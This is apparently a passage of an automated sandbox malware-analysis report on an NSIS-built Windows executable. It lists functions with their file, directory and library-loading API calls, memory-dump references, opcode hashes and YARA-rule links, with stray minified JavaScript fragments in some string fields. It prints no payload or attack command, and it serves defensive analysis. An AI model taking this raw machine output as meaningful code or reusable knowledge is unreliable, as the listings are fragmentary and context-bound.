                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 4215836453-2766056989
                                                                                                                                                                                                              • Opcode ID: ab553f87745a115a7038036096b90b8b7e77b1be170d6e80947200f8fcea40ce
                                                                                                                                                                                                              • Instruction ID: e7e9fe02224fa80e8acc3d91e69a95aa357927643f4877ada07b0f7c2baa17a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab553f87745a115a7038036096b90b8b7e77b1be170d6e80947200f8fcea40ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01112B75E142049BDB10EFB9DA89A8DBBB0AB48304F24453AE555F72D2DBB888419F18
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405F61 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004266D0,timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this,0040345A,0040A230,0040A230,0040335E,004266D0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00405F61
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID: timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 2738559852-1897978588
                                                                                                                                                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                              • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405F90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00423D35,timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this,004033DE,timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this,00423D35,004266D0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00405F90
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                                              • String ID: timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 3934441357-1897978588
                                                                                                                                                                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                              • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,0045A730,?,00405DDC,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0,00000000), ref: 00405D76
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                • Part of subcall function 0040591F: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004C9000,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1892508949-0
                                                                                                                                                                                                              • Opcode ID: 080c4fbc0bac1be490202287ae91035c68ce5d17b61444efa9045488ae083b02
                                                                                                                                                                                                              • Instruction ID: 7d59cd0ba42eeb9d64297a1bfc0940e3ae1e5cc226c4bbb5031ea1960038836b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 080c4fbc0bac1be490202287ae91035c68ce5d17b61444efa9045488ae083b02
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8811D031904510EBCF30AFA5CD4599E36A0EF15329B28493BFA45B22F1DB3E8D819A5D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405DC5 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,0045A730,?,00405DDC,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0,00000000), ref: 00405D76
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0045A730,00000000,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0,00000000), ref: 00405E1E
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(0045A730,0045A730,0045A730,0045A730,0045A730,0045A730,00000000,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0), ref: 00405E2E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3248276644-0
                                                                                                                                                                                                              • Opcode ID: c50f70bfe3bb78425b78202ba545a0a687f676b53d1ab77a34f5d173cef1449b
                                                                                                                                                                                                              • Instruction ID: 388cf340d0c034ef08ff27084220079457182ac4682ba574f5a4b5e3d5e6accd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c50f70bfe3bb78425b78202ba545a0a687f676b53d1ab77a34f5d173cef1449b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFF0F43A005E1116D62233364D09BEF0948CE82314B1A853BFC91B22D2DB3C8A539DFE
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                              • Opcode ID: 8c309843f6b2f335838841955cb70ff663a93de2c7e640db2f5b87053db46705
                                                                                                                                                                                                              • Instruction ID: b0acf179c18152fd5568b60ba426e70b62ff0895eecaeb6bac654bfa50895d4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c309843f6b2f335838841955cb70ff663a93de2c7e640db2f5b87053db46705
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD012832620210DFE7195B789D18B2A3798E710718F10467FF955F62F1EA78CC429B4D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004067C2 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                                • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                                                • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                                                • Part of subcall function 00406752: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                                                                                              • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                                              • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405EDE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                                              • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                                              • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405EB9 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405ABE,?,?,00000000,00405C94,?,?,?,?), ref: 00405EBE
                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405ED2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                              • Instruction ID: 9f0be338fa0adf84d9e7c2e76c5bc37ea56a51acd28ddc8ab22a7b028afbcef4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13D01272504420AFC2502738EF0C89FBF95DB543717124B35FAE9A22F0CB304C568A98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040599C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403498,004D5000,004D5000,004D5000,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                                                                              • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                                              • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004039E6 Relevance: 2.5, APIs: 2, Instructions: 20COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,74DF3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 004039F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,74DF3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A0C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                              • Opcode ID: ffd8599462ce3f723ad4d03e4ae191cd570dcb1409c2afe1ca7b75f560b1f18d
                                                                                                                                                                                                              • Instruction ID: cd813d42a02bf8c0cac85f8aec853e45aa6acae4c29e822381722b559998feb2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffd8599462ce3f723ad4d03e4ae191cd570dcb1409c2afe1ca7b75f560b1f18d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE08C35A4071496C520EF7CBD8D9853A286B813357208326F0BDF21F0C7389EA79EA9
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401F06 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
